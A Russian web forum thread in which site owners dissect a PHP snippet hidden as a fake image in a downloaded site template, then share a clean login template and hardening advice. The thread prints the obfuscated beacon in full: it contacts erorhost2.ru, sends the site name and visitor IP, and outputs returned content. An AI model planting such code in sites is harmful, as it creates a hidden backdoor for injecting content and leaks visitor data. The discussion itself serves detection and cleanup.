Ошибка Warning: include

Безобидная стучалка, по крайней мере в приведенных файлах. Так что может быть тревога ложная. Там вот что лежит:

$x0b = fsockopen("erorhost2.ru", 80, 0, 0, 6);

if(!$x0b){return ''; }

else{$x0e = @file("http://erorhost2.ru/id2.php?site=тут_детектится_имя_вашего_сайта&ip=здесь_ваш_ip");return implode('',$x0e); }

<?php



$x0f="file"; $x10="fsockopen"; $x11="implode"; 

$x0b = @$x10("erorhost2.ru", 80, $x0c, $x0d, 6);



if(!$x0b){ 

   return ''; 

}else{

   $x0e = @$x0f("http://erorhost2.ru/id2.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");return $x11('',$x0e);

 } 



?>

Я бы так не сказал, ибо в самом лучшем варианте данный скрипт „показал” незарегистрированных пользователей какие-то ссылке или скрипты. Но учитывая что на удалённом сервере отправляется и имя сайта, не исключено что на сайте можно найти и другие „сюрпризы”.

@kiberman,

Код Вашего login.tpl, должен выглядеть примерно так:

<?php

if ($is_logged == TRUE){



if (trim($member_id['foto']) == "") {

$foto = $config_http_home_url."{THEME}/images/noavatar.png";

} else {

$foto = $config_http_home_url."uploads/fotos/".$member_id['foto'];

}



$login_panel = <<<HTML

<div style="padding-top:5px; padding-bottom:5px; padding-left:22px;"><table width="100%" class="copy">

HTML;



if ($user_group[$member_id['user_group']]['allow_admin']) {

$login_panel .= <<<HTML

<a href="{$adminlink}" target="_blank">Админцентр</a><br />

HTML;

}



$login_panel .= <<<HTML

<form method="post" onsubmit="java script:showBusyLayer()">

<div style="display: none;" class="entry" id="entry">

<dl>

<center><img src="{$foto}" border=0 style="padding:2px; border:1px solid #e4e4e4; background-color:white;"></center>



<a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a><br />

<a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a><br />

<a href="{$link_addnews}">Добавить новость</a> | <a href="/index.php?action=logout"><strong>Завершить сеанс!</strong></a><br /><br />

</dl>

<div class="close"><a href="#" alt="X" OnClick="ls('entry'); return false;"><img src="{THEME}/images/close.png" alt="закрыть" /></a></div>

</div>

</form>



</table>

</div>

HTML;

} else {

$login_panel = <<<HTML

<div style="padding-top:5px; padding-left:21px;">

<table width="165" class="stext">

<form method="post" onsubmit="java script:showBusyLayer()">

<div style="display: none;" class="entry" id="entry">

<div class="close"><a href="#" alt="X" OnClick="ls('entry'); return false;"><img src="{THEME}/images/close.png" alt="закрыть" /></a></div>

<dl>

<dt><label for="username">Логин:</label></dt>

<dd><input id="username" name="login_name" type="text" /></dd>



<dt><label for="password">Пароль:</label></dt>

<dd><input id="password" type="password" name="login_password" /></dd>



<dt> </dt>

<dd class="last">

<a href="/?do=lostpassword">Напомнить?</a>

<button type="submit" onclick="submit();">Войти</button>

<input name="login" type="hidden" id="login" value="submit">

</dd>

</dl>

</div>

</form>

</table>

</div>

HTML;

}

?>

"Картинка" там не сама появилась, значит был доступ на запись. Если уверены, что потерять ftp Вы не могли, то ищите рядом нечто напоминающее перл\пхп админку авторов "картинки", хостера заодно попросите показать какие-нибудь логи и хотя бы подрубить php safe_mode.

Вот гады! Даже в под обычную картинку свои пакости маскируют. Никогда не качайте с нета не проверенные файлы, лучше все с нуля и самому делать.

Удалено. 10 букв.

Конечно она там сама не появилась, она попала вместе с шаблоном.

А, ну тогда не интересно. Более распространён взлом обычного сайта с последующим выставлением исполнения на формат картинок со сменой дат последнего изменения файла, вырвиглаз ощущения обеспечены.